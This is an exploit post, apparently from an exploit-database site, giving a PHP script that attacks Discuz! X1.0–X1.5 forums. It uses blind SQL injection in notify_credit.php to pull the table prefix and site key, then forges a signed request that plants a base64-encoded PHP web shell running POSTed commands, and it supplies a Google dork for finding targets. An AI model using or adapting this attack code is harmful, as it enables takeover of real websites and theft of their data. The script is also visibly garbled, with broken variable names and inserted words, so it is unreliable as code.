##################################################
# Exploit Title: [discuz! X1.0 - X1.5 Blind SQL injection exploit & Get Shell]
# Date: [06-04-2012]
# Author: [Hacker-Fire]
# Category:: [ webapps]
# Google dork: [Powered by Discuz]
# Tested on: [Windows 7 ]
##################################################
[~] P0c [~] :
<? Php
print_r ('
+ ------------------------------------------------- -------------------------- +
Discuz! 1-1.5 notify_credit.php Blind SQL injection exploit By Hacker-Fire
Description: follow-up getshell add the code down
+ ------------------------------------------------- -------------------------- +
');
if($ argc <2) {
print_r ('
+ ------------------------------------------------- -------------------------- +
Usage: php '$ argv [0].'Url [pre]
Example:
php '$ argv [0].'http://localhost/ in the
php '. $ argv [0].'http://localhost/ xss_
+ ------------------------------------------------- -------------------------- +
');
exit;
}
error_reporting(7);
the ini_set('set max_execution_time large', 0);
$ Url = $ argv [1];
$ Pre = $ argv [2]? $ Argv [2]: 'pre_';
$ Target = parse_url($ url);
extract ($ target);
$ Path1 = $ path. '/ Api / trade / notify_credit.php';
$ Hash = array();
$ Hash = the array_merge($ hash range (48, 57));
$ Hash = array_merge($ hash range (97, 102));
$ Tmp_expstr = "'";
$ Res = send ();
if(strpos($ res, 'SQL syntax') == false) {var_dump ($ res); die('Oooops.I can NOT hack it.');}
preg_match ('/ FROM \ s ([a-zA-Z_] +) forum_order /', $ res, $ match);
if($ the match [1]) $ the pre = $ match [1];
$ Tmp_expstr = "'UNION ALL SELECT 0,1,0,0,0,0,0,0,0,0 FROM {$ pre} common_setting WHERE'' ='";
$ Res = send ();
if(strpos($ res, "does not exist") == false) {
echo"Table_pre is WRONG! \ nReady to Crack It.Please Waiting .. \ n";
for($ i = 1; $ i <20; $ i + +) {
$ Tmp_expstr = "'UNION ALL SELECT 0,1,0,0,0,0,0,0,0,0 FROM information_schema.columns WHERE table_schema =
database () AND table_name LIKE'% forum_post_tableid% 'AND LENGTH (REPLACE ( table_name, 'forum_post_tableid',''))
= $ i AND'' = '";
$ Res = send ();
if(strpos($ res, 'SQL syntax')! == false) {
$ Pre ='';
$ Hash2 = array();
$ Hash2 = array_merge($ hash2 range (48, 57));
$ Hash2 = array_merge($ hash2, range (97, 122));
$ Hash2 [] = 95;
for($ j = 1; $ j <= $ i; $ j + +) {
for($ k = 0; $ k <= 255; $ k + +) {
if(in_array ($ k, $ hash2)) {
$ Char = dechex($ k);
$ Tmp_expstr = "'UNION ALL SELECT 0,1,0,0,0,0,0,0,0,0 FROM information_schema.columns WHERE table_schema =
database () AND table_name LIKE'% forum_post_tableid% 'AND MID (REPLACE ( table_name, 'forum_post_tableid',''), $ j,
1) = 0x {$ char} AND'' = '";
$ Res = send ();
if(strpos($ res, 'SQL syntax')! == false) {
echochr($ k);
$ The pre = chr($ k); the break;
}
}
}
}
if(strlen($ pre)) {echo"\ nCracked ... Table_Pre:". $ pre. "\ n"; break;} else{die('GET Table_pre Failed ..');};
}}};
echo"Please Waiting .... \ n";
$ Sitekey ='';
for($ i = 1; $ i <= 32; $ i + +) {
for($ k = 0; $ k <= 255; $ k + +) {
if(in_array ($ k, $ hash)) {
$ Char = dechex($ k);
$ Tmp_expstr = "'UNION ALL SELECT 0,1,0,0,0,0,0,0,0,0 FROM {$ pre} common_setting WHERE skey =
0x6D795F736974656B6579 AND MID (svalue, {$ i}, 1) = 0x {$ char} AND'' = '";
$ Res = send ();
if(strpos($ res, 'SQL syntax')! == false) {
echochr($ k);
$ Sitekey. = Chr($ k); break;
}}}}
/ *
By: alibaba
Modify andadd some code, andifsuccessful will be able to gain the shell
The word secret is: cmd
* /
if(strlen($ sitekey)! = 32)
{
echo"\ nmy_sitekey not found. try blank my_sitekey \ n";
}
elseecho"\ nmy_sitekey: {$ sitekey} \ n";
echo"\ nUploading Shell ...";
$ Module = 'video';
$ Method = 'authauth';
$ Params = 'a: 3: {i: 0; i: 1; i: 1; s: 36: "PD9waHAgZXZhbCgkX1BPU1RbY21kXSk7Pz4 ="; i: 2; s: 3: "php";}';
$ Sign = md5 ($ module. '|'. $ Method. '|'. $ Params. '|'. $ Sitekey);
$ Data = "module = $ module & method = $ method & params = $ params & sign = $ sign";
$ Path2 = $ path. "/ Api / manyou / my.php";
POST ($ host, 80, $ path2, $ data, 30);
echo"\ nGetting Shell Location ... \ n";
$ File ='';
for($ i = 1; $ i <= 32; $ i + +) {
for($ k = 0; $ k <= 255; $ k + +) {
if(in_array ($ k, $ hash)) {
$ Char = dechex($ k);
$ Tmp_expstr = "'UNION ALL SELECT 0,1,0,0,0,0,0,0,0,0 FROM {$ pre} common_member_field_home WHERE uid = 1 AND
MID (videophoto, {$ i}, 1) = 0x {$ char} AND'' = '";
$ Res = send ();
if(strpos($ res, 'SQL syntax')! == false) {
echochr($ k);
$ File = chr($ k); the break;
}
}
}
}
echo"\ nShell: $ host $ path / data / avatar /". substr($ file, 0,1). "/". substr($ file, 1,1). "/ $ file.php";
exit;
functionsign ($ exp_str) {
returnmd5 ("attach = tenpay & mch_vno = {$ exp_str} & retcode = 0 & key =");
}
functionthe send () {
global$ host, $ path1, $ tmp_expstr;
$ Expdata = "attach = tenpay & retcode = 0 & trade_no =% 2527 & mch_vno =". Urlencode (urlencode ($ tmp_expstr)).
"& Sign =". Sign ($ tmp_expstr);
returnPOST ($ host, 80, $ path1, $ expdata, 30);
}
functionthe POST ($ host, $ port, $ path, $ data, $ timeout, $ the cookie ='') {
$ Buffer ='';
$ Fp = fsockopen($ host, $ port, $ errno, $ errstr, $ timeout);
if($ fp) die($ host. '/'$ path. ':'. $ the errstr $ errno is);
else{
fputs($ fp, the "POST $ path HTTP/1.0 \ r \ n");
fputs($ fp, "Host: $ host \ r \ n");
fputs($ fp, "Content-type: application / x-www-form-urlencoded \ r \ n");
fputs($ fp, "Content-length:"strlen($ data). "\ r \ n");
fputs($ fp, "Connection: close \ r \ n \ r \ n");
fputs($ fp, $ the data. "\ r \ n \ r \ n");
while(! feof($ fp))
{
$ Buffer = fgets($ fp, 4096);
}
fclose ($ fp);
}
return$ buffer;
}
?>
##########################################################
[»] Greetz to :
#
[ TrOon,Aghilas,r00t_dz,EliteTorjan,Vaga-hacker,xConsole,OverDz ] #
[ & -> Th3 Viper,BriscO-Dz,LaMiN Dk, xV!rus , black hool ] #
[ And all my Freinds + Algerian Hackers ]
#
##########################################################
# 1337day.com [2012-04-06]